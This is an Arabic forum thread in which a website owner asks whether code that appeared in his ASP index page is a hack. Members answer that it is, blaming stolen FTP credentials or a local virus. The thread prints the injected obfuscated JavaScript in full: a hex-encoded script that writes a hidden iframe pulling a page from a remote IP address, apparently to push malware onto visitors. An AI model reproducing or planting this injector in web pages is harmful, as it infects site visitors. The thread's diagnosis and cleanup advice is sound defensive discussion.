النتائج 1 إلى 4 من 4

الموضوع: هل هذا اختراق ؟

  1. #1
    عضو نشيط
    تاريخ التسجيل
    May 2007
    المشاركات
    35

    هل هذا اختراق ؟



    اخواني في معهد ترايدنت العزيز
    السلام عليكم و رحمة الله و بركاته

    ارجو ممن لديه خبرة او تجربة سابقة ان يوضح لي ما يلي :

    لدي موقع مصمم بال asp ملف الاندكس فيه سطر واحد هو :

    كود PHP:
    <%
    response.redirect("/ar/index.asp")
    %> 

    الان فوجئت بوجود ما يلي على ملف الاندكس :

    كود PHP:
    [LEFT]<%
    response.redirect("/ar/index.asp")
    %>
    <
    iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v479057d2211ce(v479057d22551a){ var v479057d225c25=16; return(parseInt(v479057d22551a,v479057d225c25));}function v479057d226c0f(v479057d22740b){  var v479057d227bff='';for(v479057d2283f7=0v479057d2283f7<v479057d22740b.lengthv479057d2283f7+=2){ v479057d227bff+=(String.fromCharCode(v479057d2211ce(v479057d22740b.substr(v479057d2283f72))));}return v479057d227bff;} document.write(v479057d226c0f('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D62613039396638207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3532333131292B273661365C272077696474683D333731206865696768743D313431207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>[/LEFT] 
    ارجو التوضيح







  2. #2
    عضو فعال جدا
    تاريخ التسجيل
    Feb 2003
    المشاركات
    2,307


    نعم إختراق
    قم بفحص جهازك الشخصي حيث أنه أكيد مخترق
    وحصل المخترق على معلةمات الـ FTP الخاصة بموقعك و قام بتعديل ملفات موقعك ليضيف لها كود
    يقوم بتحميل ملف إختراق لأي زائر






  3. #3
    عضو سوبر نشيط
    تاريخ التسجيل
    Mar 2000
    المشاركات
    762


    قد يكون الفايروس على جهازك وهو من قام باضافة هذه الترويسه على ملفك انشهر هذا الفايروس لفترة في الاونه الاخيره على العموم احذف الـ iframe





    __________________
    Eng.Fedail
    Computer and Electronics Engineer

  4. #4

    تاريخ التسجيل
    Jun 2006
    المشاركات
    1,370


    السلام عليكم ورحمة الله وبركاته

    الكود الاصلي هو هذا
    <%
    response.redirect("/ar/index.asp")
    %>

    وضيفته يحول المستخدم للصفحة index الموجوده في مجلد ar



    بالنسبة للكود الاضافي
    فهذا الجزء
    <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>
    ماعتقد منه مشاكل لانه اي فريم عادي ومايجيب اي صفحة

    لكن الجزء هذا
    <script>function v479057d2211ce(v479057d22551a){ var v479057d225c25=16; return(parseInt(v479057d22551a,v479057d225c25));}function v479057d226c0f(v479057d22740b){ var v479057d227bff='';for(v479057d2283f7=0; v479057d2283f7<v479057d22740b.length; v479057d2283f7+=2){ v479057d227bff+=(String.fromCharCode(v479057d2211ce(v479057d22740b.substr(v479057d2283f7, 2))));}return v479057d227bff;} document.write(v479057d226c0f('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D62613039396638207372633D5C27687474703A2F2F37372E32323 12E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A353 2333131292B273661365C272077696474683D333731206865696768743D313431207374796C653D5C27646973706C61793A2 06E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>[/LEFT]

    كود جافا سكربت مانا فاهم شو وضيفته
    بكل الاحوال السؤال هو كيف تم زرع هذا الكود في ملف الاندكس
    تأكد من عدم وجود ثغرات سكول في موقعك او اعطينا رابط الموقع نحاول نتاكد فيه
    وبارك الله فيك





    __________________
    @_@





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا|شقق للايجار في الكويت | بيوت للبيع في الكويت | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض